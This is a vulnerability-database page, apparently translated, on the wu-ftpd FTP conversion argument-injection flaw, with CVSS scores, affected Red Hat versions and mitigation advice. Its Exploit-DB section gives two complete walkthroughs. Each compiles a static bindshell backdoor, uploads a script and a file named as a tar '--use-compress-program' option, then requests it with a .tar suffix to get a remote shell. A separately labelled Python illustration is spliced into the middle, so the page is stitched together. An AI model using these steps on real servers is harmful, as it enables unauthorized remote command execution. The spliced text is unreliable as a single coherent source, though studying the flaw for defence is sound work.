Published: 1999-12-20 00:00:00
Revised: 2008-09-05 16:18:28

[Original] wu-ftp with FTP conversion enabled allows an attacker to execute commands via a malformed file name that is interpreted as an argument to the program that does the conversion, e.g. tar or uncompress.


When an FTP client requests a file name that ends in .tar/.tar.gz/.Z/.gz, some FTP servers automatically run a program such as /bin/tar to archive or compress the file and send the result to the client; this is implemented through a pipe. A command such as tar is capable of executing arbitrary commands, so an intruder can make the FTP server start a remote shell by requesting a specially crafted file name. wu-ftpd 2.6.0 and earlier and proftpd FTP servers on some platforms (such as Linux) are known to be affected; exploiting this vulnerability requires the attacker to have permission to upload files.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/o:redhat:linux:6.1 Red Hat Linux 6.1
cpe:/o:redhat:linux:6.0 Red Hat Linux 6.0
cpe:/o:redhat:linux:5.2 Red Hat Linux 5.2

- OVAL (technical details for detection)


- Official database links
(official source) MITRE
(official source) NVD
(official source) CNNVD

- Other links and resources

- Vulnerability information

High Unknown
1999-12-20 00:00:00 2005-09-12 00:00:00

- Advisories and patches

        * This intrusion technique requires the ability to upload files; configure the FTP server correctly and deny users permission to upload files.
        * Configure the FTP server to remove users' ability to run compression and decompression on the server side.
        Washington University

- Vulnerability information (20563)

wu-ftpd 2.4.2/2.5.0/2.6.0/2.6.1/2.6.2 FTP Conversion Vulnerability (EDBID:20563)
unix remote
1999-12-20 Verified
0 suid
N/A

Some FTP servers provide a "conversion" service that pipes a requested file through a program, for example a decompression utility such as "tar", before it is passed to the remote user. Under some configurations where this is enabled a remote user can pass a filename beginning with a minus sign to FTP, which will pass this as an argument to the compression/archiver program (where it will be erroneously treated as a command line argument other than a filename). It may be possible to exploit this and execute commands on a remote machine. An example of this exploits the "--use-compress-program PROG" parameter passed to tar; if PROG refers to a program that is accessible to the FTP server, it will be executed. The remote user must have access to a writeable directory in order to exploit this. See exploit for details. 
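As an added illustration (not code from this page or from wu-ftpd), a Python model of the conversion dispatch described above, also covering the mitigation the advisory section recommends: the unsafe argv construction that lets a requested base name be read by tar as an option, beside a hardened builder that allow-lists the name, pins it under an assumed ftp_root and terminates option parsing with `--`. The conversion table, flags, paths and dispatcher are assumptions for illustration, and nothing here executes tar.

```python
import os
import re
# Conversion table modelled on the page: the requested suffix selects a
# program whose output is piped back to the FTP client (flags are assumed).
CONVERSIONS = {".tar": ["/bin/tar", "-cf", "-"],
               ".tar.gz": ["/bin/tar", "-czf", "-"],
               ".gz": ["/bin/gzip", "-c"],
               ".Z": ["/bin/compress", "-c"]}
# Allow-list for the base name: no leading '-', no spaces, no '/'.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._][A-Za-z0-9._-]*$")

def split_request(requested):
    """Return (base_name, suffix); suffix is None when no conversion applies."""
    for suffix in sorted(CONVERSIONS, key=len, reverse=True):
        if requested.endswith(suffix) and len(requested) > len(suffix):
            return requested[:-len(suffix)], suffix
    return requested, None

def vulnerable_argv(requested):
    """Unsafe: client-chosen base name appended verbatim; a leading '-' becomes a tar option."""
    base, suffix = split_request(requested)
    return None if suffix is None else CONVERSIONS[suffix] + [base]

def hardened_argv(requested, ftp_root="/var/ftp"):
    """Hardened: allow-list the name, pin it under ftp_root (assumed) and add '--'."""
    base, suffix = split_request(requested)
    if suffix is None:
        return None
    if not SAFE_NAME.match(base):
        raise ValueError("rejected conversion name: %r" % base)
    full = os.path.normpath(os.path.join(ftp_root, base))
    if os.path.commonpath([full, ftp_root]) != ftp_root:  # catches '..'
        raise ValueError("path escapes ftp root: %r" % full)
    return CONVERSIONS[suffix] + ["--", full]

def accepted(requested):
    try:
        return hardened_argv(requested) is not None
    except ValueError:
        return False

def operand_parses_as_option(argv):
    """True if the first operand after the fixed flags would be parsed as an option."""
    for prog in CONVERSIONS.values():
        if argv[:len(prog)] == prog and len(argv) > len(prog):
            first = argv[len(prog)]
            return first.startswith("-") and first != "--"
    return False
```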

With a valid FTP account on the server, the difficulty goes right down. You also have the added
benefit of not being stuck in a chroot() environment at the end. Local exploit time.

The exploit goes along much the same lines as the anonymous FTP exploit does:

Create a backdoor, using bindshell from our previous example:

$ gcc bindshell.c -o b -static

If you can perform a SITE CHMOD (default for normal non-anon users on wu-ftpd), then you can
use the following script example. Create a script to exec the desired commands:

$ cat > blah
./b &

Now create empty file "--use-compress-program=bash blah"

$ > "--use-compress-program=bash blah"

FTP to your target, login with your username/password. Upload your 3 files:

ftp> put b
ftp> put blah
ftp> put "--use-compress-program=bash blah"

Do a SITE CHMOD for b and blah:

ftp> quote SITE CHMOD 0755 b
ftp> quote SITE CHMOD 0755 blah

Now get your file:

ftp> get "--use-compress-program=bash blah".tar

That's all there is to it. You now should have a shell on whatever port you specified.


An alternative exploit that bypasses the need to use SITE CHMOD has been suggested by (this can be accomplished over anonymous FTP):

"This vulnerability is simple to exploit. However to exploit it you must be able to upload/download files. (e.g. a mode 0777 incoming directory).

For the purposes of this exploit you also need a shell in the remote path. For example, a RedHat machine with the anonftp package installed has exactly what you need.

First, assuming you are running the same platform as your target, statically compile some sort of backdoor program. A simple example is bindshell.c.

$ gcc bindshell.c -o b -static

Then, tar this up. You will need to tar it up because the remote side will rarely have the ability to change permissions at this stage.
(SITE CHMOD rarely works on anonymous ftp sites)

$ tar -cf b.tar b

Create a script of things you want to do on the remote site, this will be interpreted by bash or sh.

$ cat > blah
/bin/tar -xf b.tar

Leave the first line as a comment.

Create an empty file called "--use-compress-program=sh blah"

$ > "--use-compress-program=sh blah"

Connect to your target ftp server.

$ ftp localhost
Connected to localhost.
220 localhost.localdomain FTP server (Version wu-2.6.0(1) Tue Sep 21 10:10:10 EDT 2000) ready.
Name (localhost:suid): ftp
331 Guest login ok, send your complete e-mail address as password.
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.

Change to your world writeable directory:

ftp> cd /incoming

Store your files:

ftp> put blah
ftp> put b.tar
ftp> put "--use-compress-program=sh blah"

Now using TAR conversion, get your "--use-compress-program=sh blah" file.

ftp> get "--use-compress-program=sh blah".tar

It should open a connection then freeze. Now telnet to your bindshell port."

- Vulnerability information

WU-FTPD FTP Conversion Service Malformed File Name Handling Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability description

- Timeline

1999-12-19 Unknown
1999-12-19 Unknown

- Solution


Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete